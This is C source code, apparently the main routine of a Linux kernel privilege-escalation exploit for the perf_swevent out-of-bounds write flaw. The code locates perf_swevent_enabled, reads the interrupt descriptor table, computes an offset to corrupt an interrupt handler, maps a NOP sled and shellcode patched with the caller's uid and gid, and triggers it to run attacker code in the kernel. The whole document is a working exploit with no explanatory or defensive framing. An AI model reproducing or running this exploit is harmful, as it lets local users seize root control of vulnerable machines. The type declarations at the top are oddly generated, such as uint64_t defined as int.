
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int uint8_t ;
typedef int uint64_t ;
typedef int uint32_t ;
struct idt {int addr; } ;


 int BASE ;
 int BASE_JUMP ;
 int KSIZE ;
 int MAP_ANONYMOUS ;
 scalar_t__ MAP_FAILED ;
 int MAP_FIXED ;
 int MAP_PRIVATE ;
 int PROT_EXEC ;
 int PROT_READ ;
 int PROT_WRITE ;
 int SIGALRM ;
 int SIZE ;
 int TMP (int) ;
 int __sc_next ;
 int __sc_start ;
 void* _fd ;
 int alarm (int) ;
 int assert (int) ;
 int close (int) ;
 int err (int,char*) ;
 int errx (int,char*,...) ;
 int exit (int ) ;
 int find_mem (int *,int) ;
 int getgid () ;
 int getuid () ;
 int * map_mem (int) ;
 int memcpy (int *,int,int) ;
 int memset (int *,int,int) ;
 scalar_t__ mmap (int *,int,int,int,int,int ) ;
 int morte ;
 int munmap (int *,int) ;
 void* perf_open (int) ;
 int printf (char*,...) ;
 int sc ;
 int sc_replace (int *,int ,int ) ;
 int signal (int ,int ) ;
 int trigger (int) ;

int main(int argc, char *argv[])
{
 uint32_t *p[2];
 int fd, i;
 uint64_t off;
 uint64_t addr = BASE;
 struct idt idt;
 uint8_t *kbase;
 int sz = 4;
 int intr = 4;

 printf("Searchin...\n");

 p[0] = map_mem(BASE);
 p[1] = map_mem(BASE_JUMP);

 memset(p[1], 0x69, SIZE);

 off = 0xFFFFFFFFL;
 fd = perf_open(off);
 close(fd);

 i = find_mem(p[0], 0xff);
 if (i == -1) {
  i = find_mem(p[1], 0x68);

  if (i == -1)
   errx(1, "Can't find overwrite");

  sz = 24;
  addr = BASE_JUMP;
  printf("detected CONFIG_JUMP_LABEL\n");
 }

 munmap(p[0], SIZE);
 munmap(p[1], SIZE);

 addr += i;
 addr -= off * sz;

 printf("perf_swevent_enabled is at 0x%lx\n", addr);

 asm("sidt %0" : "=m" (idt));

 printf("IDT at 0x%lx\n", idt.addr);

 off = addr - idt.addr;
 off -= 8;

 switch (off % sz) {
 case 0:
  intr = 0;
  break;

 case 8:
  intr = 0x80;
  break;

 case 16:
  intr = 4;
  break;

 default:
  errx(1, "remainder %d", off % sz);
 }

 printf("Using interrupt %d\n", intr);

 off -= 16 * intr;

 assert((off % sz) == 0);

 off /= sz;
 off = -off;



 kbase = (uint8_t*) (idt.addr & 0xFF000000);

 printf("Shellcode at %p\n", kbase);

 if (mmap(kbase, KSIZE, PROT_READ | PROT_WRITE | PROT_EXEC,
      MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0) == MAP_FAILED)
  err(1, "mmap()");

 memset(kbase, 0x90, KSIZE);
 kbase += KSIZE - 1024;

 i = __sc_next - __sc_start;
 memcpy(kbase, __sc_start, i);
 kbase += i;
 memcpy(kbase, sc, 900);

 sc_replace(kbase, TMP(1), getuid());
 sc_replace(kbase, TMP(2), getgid());

 signal(SIGALRM, morte);
 alarm(2);

 printf("Triggering sploit\n");
 _fd = perf_open(off);

 trigger(intr);

 exit(0);
}
